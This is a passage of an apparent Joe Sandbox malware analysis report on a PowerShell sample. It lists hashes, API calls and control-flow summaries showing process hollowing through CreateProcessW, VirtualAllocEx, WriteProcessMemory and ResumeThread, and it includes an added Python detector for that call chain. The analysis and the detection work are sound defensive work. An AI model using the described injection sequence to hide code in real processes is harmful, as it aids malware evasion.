• Snapshot File: hcaresult_1_2_77c0000_powershell.jbxd
Similarity
• API ID:
• String ID: 84i$84i
• API String ID: 0-1526663543
• Opcode ID: 473b117510c44db6d55862ba97af0d64cacb4864cc97606c5d9ea0be2f353945
• Instruction ID: f1212396850518108060d9903e945c70643e0dd209cb5ab66f21f6aac7dcd702
• Opcode Fuzzy Hash: 473b117510c44db6d55862ba97af0d64cacb4864cc97606c5d9ea0be2f353945
• Instruction Fuzzy Hash: 1B5114B1700314EFDB14EB689810B2ABBE6ABC9B50F24845EE949DF381DA71DD41C7E1
APIs
• URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 031051C9
Memory Dump Source
• Source File: 00000001.00000002.1587663694.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_3100000_powershell.jbxd
Similarity
• API ID: DownloadFile
• String ID:
• API String ID: 1407266417-0
• Opcode ID: 742f1e25dc6f1fc1b0ad2a3082b1c2bf0517c2b676d5db18743e11a4d3117725
• Instruction ID: 5f0254fad352b7850649cbe91835802ea107278d1067f84703d2a1debcb14b50
• Opcode Fuzzy Hash: 742f1e25dc6f1fc1b0ad2a3082b1c2bf0517c2b676d5db18743e11a4d3117725
• Instruction Fuzzy Hash: 392104B1D01619EFDB04CF9AD984ADEFBF5FB48310F14812AE918A7250D374AA50CFA4
Memory Dump Source
• Source File: 00000001.00000002.1587216124.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_308d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3f3bbf667f4fd205b004cca8330f12db6c7c0d5d2c504d31e820fdfce7afefe7
• Instruction ID: 6d6979fc2a7c1875e563b621c6dd05e7e0b8666d5bb969946ff55caafa10a02c
• Opcode Fuzzy Hash: 3f3bbf667f4fd205b004cca8330f12db6c7c0d5d2c504d31e820fdfce7afefe7
• Instruction Fuzzy Hash: 3401F771406304ABE710AF25DC80B67FBD8EF41624F08C659DD880A282C3799441CEB2
Memory Dump Source
• Source File: 00000001.00000002.1587216124.000000000308D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0308D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_308d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c9eb947f76359def08322c938c299a42ba16b42766dab4fe020d5c7a85211398
• Instruction ID: d9fda4b5f1fd75394a932c50ae9295c54a2c14caf33be6efeeaa4dcb71de3646
• Opcode Fuzzy Hash: c9eb947f76359def08322c938c299a42ba16b42766dab4fe020d5c7a85211398
• Instruction Fuzzy Hash: 0901ED7140E3C49FE7128B259D94B52BFB89F47224F1D81DBD9888F1A3C2695845CB72
Memory Dump Source
• Source File: 00000003.00000002.1481305550.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1f184ae753d011f0013c74de49662260d6a03304179747b1dad56d18dabb2f9c
                                                                                                                                                                                                                                  • Instruction ID: c06484007503262cdf823ab9c3e1532d3bb2a88a61ecddf28e2975e977573040
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f184ae753d011f0013c74de49662260d6a03304179747b1dad56d18dabb2f9c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A128DB17443198FDB55AB68C81076A7BA2AFC2251F64C4BFD506DF282DB31CD42C7A2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 09c8e5902bf915d1551e151f06ec429236cbdf9299580d91c68322439f931e37
                                                                                                                                                                                                                                  • Instruction ID: 374a5e24063ae19c637cac3f8417c6e12948832814c1f0a8f092061dadfcb066
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09c8e5902bf915d1551e151f06ec429236cbdf9299580d91c68322439f931e37
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9916C74A00605CFCB15DF58C494AAAFBB1FF88310B258A99D815EB7A5C736FC51CBA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1481305550.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b0120d02198e9872698fb1f21427721d99567ec627028baa0b7000f5a0857988
                                                                                                                                                                                                                                  • Instruction ID: 48be2b12e76461155b8c6ae0ae28e68b5144427c361ce272a3b4f48d196bcc6b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0120d02198e9872698fb1f21427721d99567ec627028baa0b7000f5a0857988
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 024136F1A8030ACFDB55AF15C540B6977B2AF85284B94C8AED905DF245D731CD42C7B2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e885b7a86db3b832dcb8f6ffae54f794decc0ff7c4f56b5e944ace82212ea17c
                                                                                                                                                                                                                                  • Instruction ID: 6d0398af8f09f225a7a5bdd6caa720965a8c999a69e9589cf3315ce996874e4d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e885b7a86db3b832dcb8f6ffae54f794decc0ff7c4f56b5e944ace82212ea17c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0741E5759093959FD702DF6CD8A47DABFB4BF46204F0544CAC085DF262DB34A805CBA6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: e705d3760f881377971f6e001c05c84b5d9796c7b3a29fd6a51ce11abfc26d8e
                                                                                                                                                                                                                                  • Instruction ID: 7add501c72381ea4475a9b44c4cc3cc4e305bf84ab8972566db7771bcdeb5f43
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e705d3760f881377971f6e001c05c84b5d9796c7b3a29fd6a51ce11abfc26d8e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2413974A00605DFCB05DF58C598AAAF7B1FF88310B218699D815AB764C736FC51CBA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a8d1ffccb5c4932447ac6130b5f642b0b339857cc71a4964289baf0d1b3384f6
                                                                                                                                                                                                                                  • Instruction ID: 4f227d1e3e484a07863f555357ed072c21329665690b0cf0c65d9a3717afd2a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8d1ffccb5c4932447ac6130b5f642b0b339857cc71a4964289baf0d1b3384f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11212C74A0020ADFCB01DF98D9809AABBB1FF89310B25859AE805EB351D735FC41CBA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476244076.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2fbd000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7a99ddfca876ce443066996e71343b9eea1c2a5a312559d9d8a2273d7d21972e
                                                                                                                                                                                                                                  • Instruction ID: c1565c1134acbd7f4b25cfbcdf2de9c3c72fad116fede7ba78ae548d2b0f5ac8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a99ddfca876ce443066996e71343b9eea1c2a5a312559d9d8a2273d7d21972e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1001F771505344AAE7214A26DC80BA7FBD8EF41AE4F08C059DE080B24AC3799841CAB3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476244076.0000000002FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FBD000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_2fbd000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: cd8229e0eceecfc60d38ae764e04f2f3a5b0f1a77dc424199f692d850ce1c693
                                                                                                                                                                                                                                  • Instruction ID: 0872fcbd18d76571d1a679946669f403c802bbae6c2e24babbedf0164186bf73
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd8229e0eceecfc60d38ae764e04f2f3a5b0f1a77dc424199f692d850ce1c693
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55015E6140E3C09FD7138B258894BA2BFB4EF43664F1D80DBD9888F1A7C2695849CB72
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 7cb6023cd35ca964767ed3bb599d4ddc0e98b11d9a86d6fe0ad09fe882c50e91
• Instruction ID: 0bcb509d86de6f1a71b078e31d9b15364a2b3d9a7bfcb736694b9d732d486477
• Opcode Fuzzy Hash: 7cb6023cd35ca964767ed3bb599d4ddc0e98b11d9a86d6fe0ad09fe882c50e91
• Instruction Fuzzy Hash: A9F03C396001059FDB05DF98D994AEDB772FF88320F208699E524A7250C732F851CB65

Memory Dump Source
• Source File: 00000003.00000002.1476585480.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4880000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 12d76f9539279f02e03d08223f7b0367e20563095604dee160d16866bc7aeaa5
• Instruction ID: 3193b83290bf4c156aca29846f7858e230c7e47fa9cd511f80c4ecb32ede05fe
• Opcode Fuzzy Hash: 12d76f9539279f02e03d08223f7b0367e20563095604dee160d16866bc7aeaa5
• Instruction Fuzzy Hash: 02310C7640EBC56FC3139B208C6A4997FB0EE13648B0F4ADBC0C5CB5A3D759550AC752

Strings

Memory Dump Source
• Source File: 00000003.00000002.1481305550.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7780000_powershell.jbxd
Similarity
• API ID:
• String ID: i$i$i$i
• API String ID: 0-1528663918
• Opcode ID: 6e6613548a1194bc24a4311e4756476ddfad3e2474afa282c3a24f51ea2ffae3
• Instruction ID: 37fbbdbee17a3930e0351986a03a51c8ba3ac964046fc0df2dafb29ca143e27c
• Opcode Fuzzy Hash: 6e6613548a1194bc24a4311e4756476ddfad3e2474afa282c3a24f51ea2ffae3
• Instruction Fuzzy Hash: 2DF138B1B442098FDB54AB68D4007AABBE5AFD5360F6884BFD54ACF241DB31CD42C7A1

Memory Dump Source
• Source File: 00000008.00000002.2371442635.0000000002E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2e6d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9004bf2c3ad0ebd896370b4991610b58881ba7cad5676fc88498f3772fd09c8b
• Instruction ID: f14132742e26b6d621717dfcf28771769a332677130cbd36626904caacc94edb
• Opcode Fuzzy Hash: 9004bf2c3ad0ebd896370b4991610b58881ba7cad5676fc88498f3772fd09c8b
• Instruction Fuzzy Hash: D501526114E3C09FD7128B258C94B62BFB4DF43668F1DC1DBD8888F1A3C2695845CB72

Memory Dump Source
• Source File: 00000008.00000002.2371442635.0000000002E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E6D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2e6d000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 46ab91ad5a32a433cdaee255c3de609dbecd920bc6039cd8f05a9388c4abcf7e
• Instruction ID: 6d32bdb9cc89771d27c43ff4d948a63a523afc8ee5ab039a961b09e0d9d9ab71
• Opcode Fuzzy Hash: 46ab91ad5a32a433cdaee255c3de609dbecd920bc6039cd8f05a9388c4abcf7e
• Instruction Fuzzy Hash: 2B01F771684344ABEB604A65DC88B77BF98EF816B8F58C05ADC084A242C3789845CAB2

Memory Dump Source
• Source File: 00000008.00000002.2378767040.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_48a0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8c4edda03a37b09f116caf2dfad73461272bae4f214a369a42176b27e4436699
• Instruction ID: 3776e724ff2b1c2e4c3e2d41b6019b4ba78038c04ce9572a98d1871c20241ffc
• Opcode Fuzzy Hash: 8c4edda03a37b09f116caf2dfad73461272bae4f214a369a42176b27e4436699
• Instruction Fuzzy Hash: 95F0DA35A001059FDB15CF9DD890AEEF7B1FF88324F208159E515A72A1C736ED52CB50

Execution Graph

Execution Coverage: 8.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 115
Total number of Limit Nodes: 10

The execution graph is rendered as an image on the original page; only its node and edge listing survived extraction. What the listing shows: the graph is rooted at 0x4788cdf and passes through 0x4789198, 0x47891a3, 0x47892b0 and 0x47892bd into four entry points of one routine (0x4789720, 0x4789725, 0x4789728 and 0x47893a5). Each of them makes the same seven API calls in the same order: CreateProcessW (through the wrapper at 0x4788268), Wow64SetThreadContext (wrapper at 0x4788274), VirtualAllocEx at 0x47899ae, VirtualAllocEx at 0x4789a49, WriteProcessMemory (wrapper at 0x478828c, reached from 0x4789ace, 0x4789be4 and 0x4789c48), Wow64SetThreadContext again (wrapper at 0x4788298), and finally ResumeThread at 0x4789ce0. Every stage has a failure edge to the common exit block at 0x4789d20, which returns to 0x47891a0. This is the create-suspended, rewrite-context, allocate-and-write, resume pattern behind the "Injects a PE file into a foreign processes" signature; the Wow64 variants of the thread-context calls mean the injecting PowerShell process is a 32-bit (WOW64) process.
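The call chain in the execution graph (CreateProcessW, Wow64SetThreadContext, VirtualAllocEx, WriteProcessMemory, Wow64SetThreadContext, ResumeThread) is the sequence a detection engineer would hunt for in an API trace. The following is an added example, not part of the Joe Sandbox report, that matches that chain as an ordered subsequence of per-process API events and requires every stage after CreateProcess to target the child process that was just created. The trace format (`pid=… api=… target=…`) and all process ids in it are constructed for the example; the first block of events mirrors the order of calls in the graph above, the other two blocks are the negatives a practitioner wants handled (a launcher that resumes a child without touching its memory, and an injection that never reaches ResumeThread).

```python
"""Flag a process-hollowing style API chain in a per-process API trace.

Added example; not code from the Joe Sandbox report or the sample.
The trace format and process ids below are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Ordered stages of the chain seen in the report's execution graph. Each stage
# lists the API names that satisfy it. Matching is done as an ordered
# subsequence, so extra calls in between (a second VirtualAllocEx, a
# GetThreadContext, several WriteProcessMemory calls) do not break the match.
STAGES = (
    ("create",  {"CreateProcessW", "CreateProcessA"}),
    ("alloc",   {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write",   {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("context", {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}),
    ("resume",  {"ResumeThread", "NtResumeThread"}),
)


@dataclass(frozen=True)
class ApiCall:
    pid: int      # calling process
    api: str      # API name as logged
    target: int   # process the call acts on: the new child for create,
                  # the process behind the handle for the others


# Constructed trace line format: "pid=<n> api=<Name> target=<n>"
LINE_RE = re.compile(r"^pid=(\d+)\s+api=(\w+)\s+target=(\d+)$")


def parse_trace(text: str) -> list[ApiCall]:
    """Parse the constructed trace format; blank lines and '#' comments are skipped."""
    calls: list[ApiCall] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparseable trace line: {line!r}")
        calls.append(ApiCall(int(m[1]), m[2], int(m[3])))
    return calls


def find_hollowing(calls: list[ApiCall]) -> list[tuple[int, int, list[str]]]:
    """Return (injector pid, child pid, matched API names) for every complete chain.

    A chain starts at a CreateProcess call and is complete only when all later
    stages are seen, in order, from the same caller and aimed at that child.
    """
    by_pid: dict[int, list[ApiCall]] = {}
    for c in calls:
        by_pid.setdefault(c.pid, []).append(c)

    hits: list[tuple[int, int, list[str]]] = []
    for pid, seq in by_pid.items():
        for i, start in enumerate(seq):
            if start.api not in STAGES[0][1]:
                continue
            child = start.target
            matched = [start.api]
            stage = 1
            for later in seq[i + 1:]:
                if stage == len(STAGES):
                    break
                _, apis = STAGES[stage]
                if later.api in apis and later.target == child:
                    matched.append(later.api)
                    stage += 1
            if stage == len(STAGES):
                hits.append((pid, child, matched))
    return hits


# Constructed sample trace. The first block follows the call order in the
# execution graph above; the other two are negatives the detector must ignore.
SAMPLE_TRACE = """
# injector: same order of calls as the report's execution graph
pid=6100 api=CreateProcessW target=7244
pid=6100 api=Wow64SetThreadContext target=7244
pid=6100 api=VirtualAllocEx target=7244
pid=6100 api=VirtualAllocEx target=7244
pid=6100 api=WriteProcessMemory target=7244
pid=6100 api=WriteProcessMemory target=7244
pid=6100 api=WriteProcessMemory target=7244
pid=6100 api=Wow64SetThreadContext target=7244
pid=6100 api=ResumeThread target=7244
# benign launcher: creates a child and resumes it without touching its memory
pid=4120 api=CreateProcessW target=4388
pid=4120 api=ResumeThread target=4388
# aborted injection: the chain stops before ResumeThread
pid=5012 api=CreateProcessW target=5200
pid=5012 api=VirtualAllocEx target=5200
pid=5012 api=WriteProcessMemory target=5200
pid=5012 api=Wow64SetThreadContext target=5200
"""

if __name__ == "__main__":
    for pid, child, chain in find_hollowing(parse_trace(SAMPLE_TRACE)):
        print(f"pid {pid} hollowed child {child}: {' -> '.join(chain)}")
```

Requiring the target to be the freshly created child is what keeps a benign launcher (create, then resume) and an ordinary self-modifying process (alloc and write in its own address space) out of the hits; the aborted chain is left unflagged on purpose here, but a production rule would usually alert on it as well, since the memory write into a suspended child is already the suspicious part.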

Control-flow Graph

• Executed
• Not Executed

Control-flow graph of the routine at 0x47893a5, rendered as an image on the original page; only the basic-block listing survived extraction. The listing covers blocks 0x47893a5 through 0x4789f26 and shows the calls in this order: call 0x4788268 (the CreateProcessW wrapper) at 0x4789813, call 0x4788274 (Wow64SetThreadContext) at 0x478988a, call 0x4788280 at 0x47898e3, VirtualAllocEx at 0x47899a6 and 0x4789a49, call 0x478828c (WriteProcessMemory) at 0x4789ace, 0x4789be4 and 0x4789c48, call 0x4788298 (Wow64SetThreadContext) at 0x4789cbf, ResumeThread at 0x4789ce0, and call 0x47875d4 at 0x4789ed8 on the exit path. Failure edges from every stage converge on 0x4789e82 or on the chain of stub blocks 0x4789e25 to 0x4789e7b before the common epilogue at 0x4789e87.

Memory Dump Source
• Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3abd63e16eba42d38691cc9ffa1d85dcf51b6f3d11799ea93127e3770373b47
• Instruction ID: 33529b73babba9094523d23747ca98fe0841f69fa3b0eb7125e638ef833f65b3
• Opcode Fuzzy Hash: d3abd63e16eba42d38691cc9ffa1d85dcf51b6f3d11799ea93127e3770373b47
• Instruction Fuzzy Hash: 3CF184B1A40218CFEB20DF75CC44BA9BBB6AF85344F1481ADD649A7391DB70AD84CF51

Control-flow Graph

• Executed
• Not Executed

Control-flow graph of the routine at 0x4789728, rendered as an image on the original page; only the basic-block listing survived extraction. It is block for block the same graph as the routine at 0x47893a5 above, with a different entry block (0x4789728 to 0x47897d9) that falls into the shared body at 0x47897df: the same calls to 0x4788268 (CreateProcessW), 0x4788274 and 0x4788298 (Wow64SetThreadContext), VirtualAllocEx at 0x47899a6 and 0x4789a49, 0x478828c (WriteProcessMemory), ResumeThread at 0x4789ce0 and 0x47875d4 on the exit path, with the same failure edges into 0x4789e82 and the 0x4789e25 to 0x4789e7b stubs.

APIs
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 047899E2
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04789A84
                                                                                                                                                                                                                                    • Part of subcall function 0478828C: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18A22514,00000000,?,?,?,00000000,00000000,?,04789AE7,?,00000000,?), ref: 0478A35C
                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 04789D07
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual$MemoryProcessResumeThreadWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2390764575-0
                                                                                                                                                                                                                                  • Opcode ID: 7445b43785cb795567d4e7bcc19c541a042b939ce72c4ee4cf9ba16e56628cff
                                                                                                                                                                                                                                  • Instruction ID: 974e1e1b23762bbde09c7de507850147426843307d09a2849e636c960623117a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7445b43785cb795567d4e7bcc19c541a042b939ce72c4ee4cf9ba16e56628cff
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4812A2F1B402198FEB24AB75C8547AEB7B2AF85344F1480ACD909EB390DB75AD84CF51

Control-flow Graph
Control-flow graph (rendered figure in the report; recoverable content): second listing of the same routine, entered at 0x4789725 (blocks 0x4789725-0x4789f26) with an identical block structure: calls to 0x4788268, 0x4788274, 0x4788280, three calls to 0x478828c, call 0x4788298 and call 0x47875d4; VirtualAllocEx at blocks 0x47899a6 and 0x4789a49, ResumeThread at block 0x4789ce0. No API list was recorded for this entry.
Memory Dump Source
• Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3dbbbd3f36d8a53d2899d4f9698a421d54fc64ab22b0c218c9ca11b0a6fe5329
• Instruction ID: 7d329e3413e9a9a35c5b77af841406364e1ed9640f1601d44514a4876bbb7f9b
• Opcode Fuzzy Hash: 3dbbbd3f36d8a53d2899d4f9698a421d54fc64ab22b0c218c9ca11b0a6fe5329
• Instruction Fuzzy Hash: 0AF173B1A40218CFEB20DF75CC44BAABBB6AF85344F1481ADD648A7391DB71AD84CF51

Control-flow Graph
Control-flow graph (rendered figure in the report; recoverable content): third listing of the same routine, entered at 0x4789720 (blocks 0x4789720-0x4789f26), again with calls to 0x4788268, 0x4788274, 0x4788280, three calls to 0x478828c, call 0x4788298 and call 0x47875d4; VirtualAllocEx at blocks 0x47899a6 and 0x4789a49, ResumeThread at block 0x4789ce0. No API list was recorded for this entry.
Memory Dump Source
• Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd7646ba87198e6c65c01848171eb2c5e36d8aea06e2facbe48937200a327d05
• Instruction ID: 24f8ca88c5faf08c225c9f1d45820c2a6bbbd110fd094f8d812a1087524189e0
• Opcode Fuzzy Hash: cd7646ba87198e6c65c01848171eb2c5e36d8aea06e2facbe48937200a327d05
• Instruction Fuzzy Hash: 2EF174B1A40218CFEB20DF75CC44BAABBB6AF85344F1481ADD649A7391DB70AD84CF51

Control-flow Graph
Control-flow graph (rendered figure in the report; recoverable content): function at 0x4788268 (blocks 0x4788268-0x478a131), the routine the injector above reaches with call 0x4788268. Main path: three short conditional blocks at 0x4789fa3-0x4789fd9 → CreateProcessW (block 0x4789fdc-0x478a07f) → 0x478a088-0x478a12a → 0x478a131, which loops to itself.
APIs
• CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,730A10FC,?), ref: 0478A06C
The dwCreationFlags argument (sixth position) is shown as "?", so this listing alone does not show whether the child is created suspended; the ResumeThread call in the caller is the only hint that it is. Treat the process-creation event paired with the caller's RWX allocation and WriteProcessMemory as the detection unit, not CreateProcessW by itself.
Memory Dump Source
• Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 962397695d3d5412a5ac5ef06d3f8785e5d48bf373614905370b668749d145a1
• Instruction ID: d0fa41d46fe1aacc2d4ce4c2920a073a127226de375b60a36185b650b188e681
• Opcode Fuzzy Hash: 962397695d3d5412a5ac5ef06d3f8785e5d48bf373614905370b668749d145a1
• Instruction Fuzzy Hash: 90512871901229DFEF24DF99C840BDDBBB5BF48304F1084AAE909B7250EB71AA85CF50

Control-flow Graph
Control-flow graph (rendered figure in the report; recoverable content): second listing of the CreateProcessW routine, entered at 0x4789f20 (blocks 0x4789f20-0x478a131) with the same block structure: conditional blocks at 0x4789fa3-0x4789fd9 → CreateProcessW (block 0x4789fdc-0x478a07f) → 0x478a088-0x478a12a → self-loop at 0x478a131.
APIs
• CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,730A10FC,?), ref: 0478A06C
Memory Dump Source
• Source File: 0000000A.00000002.1870251603.0000000004780000.00000040.00000800.00020000.00000000.sdmp, Offset: 04780000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_4780000_powershell.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 28cd685153f6b3369ebb84addaede69d9150671d7961d18848f52329d63f70ec
• Instruction ID: e0181f3b15c6107e5910b8e8945d82e42bfe198ebfac257cc7f9fd47f42d951f
• Opcode Fuzzy Hash: 28cd685153f6b3369ebb84addaede69d9150671d7961d18848f52329d63f70ec
